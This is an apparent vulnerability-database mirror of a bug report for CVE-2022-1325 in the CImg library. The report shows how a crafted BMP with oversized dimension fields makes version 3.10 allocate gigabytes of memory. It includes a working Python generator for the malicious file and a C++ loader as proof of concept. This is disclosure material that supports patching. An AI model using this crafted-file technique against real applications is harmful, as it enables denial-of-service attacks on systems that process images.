Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntr7unn3lA5E4FC45-8F14-4DD1-811B-740FC50C95D2
HistoryMar 25, 2022 - 12:16 a.m.

unchecked size in _load_bmp leads to RAM exhaustion in version 3.10

2022-03-2500:16:31
7unn3l
www.huntr.dev
12
ram exhaustion
image file
buffer size
denial of service
cimg vulnerability
system memory
allocation
security bug

EPSS

0.001

Percentile

46.8%

JSON

Description

Via a maliciously crafted bmp file with modified dx and dy header field values it is possible to trick the application into allocating huge buffer sizes like 64 Gigabyte upon reading the file from disk or from a virtual buffer.

Version

This does affect the newest Version of Cimg which is 3.10, commit 607aea7c89fd66470e58a77b126584132d9af8f8 as the time of writing.

Proof of Concept

Due to the fact that I cannot attach files in this format, here is a small python script that will generate a bmp file with given dimmensions. Note that the final buffer size is calculated by multiplying the product of width and height by 3. This code snippet uses a sample value of 5 GB.

import struct

def write_size(dx,dy):
    x = struct.pack('I',dx)
    y = struct.pack('I',dy)
    
    min_bmp_head = list(
               b'BM\xf2Y\x03\x00\x00\x00\x00\x006\x04\x00\x00(\x00\x00\x00 \
               V\xa8\xab1\x02\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00 \
               \xbcU\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \
               \x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x01\x01\x00\x03\x03'
                        )

    min_bmp_head[0x12] = x[0]
    min_bmp_head[0x13] = x[1]
    min_bmp_head[0x14] = x[2]
    min_bmp_head[0x15] = x[3]

    min_bmp_head[0x16] = y[0]
    min_bmp_head[0x17] = y[1]
    min_bmp_head[0x18] = y[2]
    min_bmp_head[0x19] = y[3]

    open('crash.bmp','wb').write(bytes(min_bmp_head))

write_size(833333334,2) # use these two parameters to control dx and dy of the image. 833333334,2 for 5 GB

then read the file via standard methods:

#define cimg_display 0
#include "CImg.h"
#include <iostream>

int main(int argc,const char* argv[]){

    if (argc < 2){
        printf("no img\n");
        exit(1);
    }

    cimg_library::CImg<unsigned char> img;
    img.assign(argv[1]);
}

Root cause

altough safe_size (line 11771) does check for overflows of the size_t type, it does allow very large values . One would think that the try/catch block try { _data = new T[siz]; } (line 11885) does not allow for allocations that are too big and would completely circumvent this attack but actually, allocations that are equal to the maximum available RAM of a system or even numbers that are a bit higher (I tested the 5 GB case on a 4GB RAM machine) will not thorw an exception like std::bad_alloc.

Impact

This vulnerability allows an attacker who can send images to an application to force an premature process exit and exhaust system memory, potentially leading to a full system denial of service.

Related

osv 1
nvd 1
debiancve 1
cvelist 1
gitlab 1
prion 1
ubuntucve 1
cve 1
osv
osv
CVE-2022-1325
2022-08-31 16:15:09
nvd
nvd
CVE-2022-1325
2022-08-31 16:15:09
debiancve
debiancve
CVE-2022-1325
2022-08-31 16:15:09
cvelist
cvelist
CVE-2022-1325
2022-08-31 15:33:00
gitlab
gitlab
Allocation of Resources Without Limits or Throttling
2022-08-31 00:00:00
prion
prion
Buffer overflow
2022-08-31 16:15:00
ubuntucve
ubuntucve
CVE-2022-1325
2022-08-31 00:00:00
cve
cve
CVE-2022-1325
2022-08-31 16:15:09

EPSS

0.001

Percentile

46.8%

JSON
Related for A5E4FC45-8F14-4DD1-811B-740FC50C95D2
osv1nvd1debiancve1cvelist1gitlab1prion1ubuntucve1cve1